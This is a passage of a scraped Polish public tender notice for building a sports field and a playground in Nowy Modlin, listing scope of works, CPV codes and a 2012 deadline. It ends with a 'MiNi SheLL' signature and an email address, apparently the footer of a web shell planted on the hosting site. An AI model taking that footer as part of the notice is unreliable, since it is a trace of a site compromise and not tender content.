e)	urządzenie elementów małej architektury.
2. W ramach realizacji zadania przewiduje się:
a)	wykonanie ciągów pieszych z ukształtowaniem terenu,
b)	wykonanie boiska do siatkówki i koszykówki z nawierzchnią z trawy syntetycznej,
c)	wykonanie ogrodzenia - piłkochwytów,
d)	montaż wyposażenia tzn. ławek, koszy na śmieci, elementów zabaw dla dzieci 
i innych elementów małej architektury,
e)	nowo ukształtowany teren przewidziany jest do humusowania i obsiania trawą.
3. Szczegółowy opis przedmiotu zamówienia zawarty jest w: dokumentacji technicznej, specyfikacji technicznej wykonania robót oraz przedmiarze robót, stanowiących załączniki do Rozdziału III niniejszej SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 45.11.27.23-9, 45.23.61.10-4, 37.53.52.00-9, 45.11.27.00-2, 34.92.82.00-0, 45.23.32.22-1, 77.21.16.00-8, 45.11.27.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa placu zabaw w Nowym Modlinie, działka nr ew. 14/7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Urządzenie terenu rekreacyjnego przewiduje następujący zakres robót:
a)	roboty ziemne,
b)	układanie krawężników,
c)	układanie nawierzchni,
d)	montaż ogrodzeń,
e)	urządzenie elementów małej architektury.
2. W ramach realizacji zadania przewiduje się:
a)	wykonanie ciągów pieszych z ukształtowaniem terenu,
b)	wykonanie ogrodzenia systemowego,
c)	montaż wyposażenia tzn. altany, ławek, koszy na śmieci, elementów zabaw dla dzieci i innych elementów małej architektury,
d)	nowo ukształtowany teren przewidziany jest do humusowania i obsiania trawą.
3.	Szczegółowy opis przedmiotu zamówienia zawarty jest w: dokumentacji technicznej, specyfikacji technicznej wykonania robót oraz przedmiarze robót, określonej w Rozdziale III niniejszej SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 37.53.52.00-9, 45.11.12.00-0, 45.11.27.00-2, 34.92.82.00-0, 45.23.32.22-1, 77.21.16.00-8, 45.11.27.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com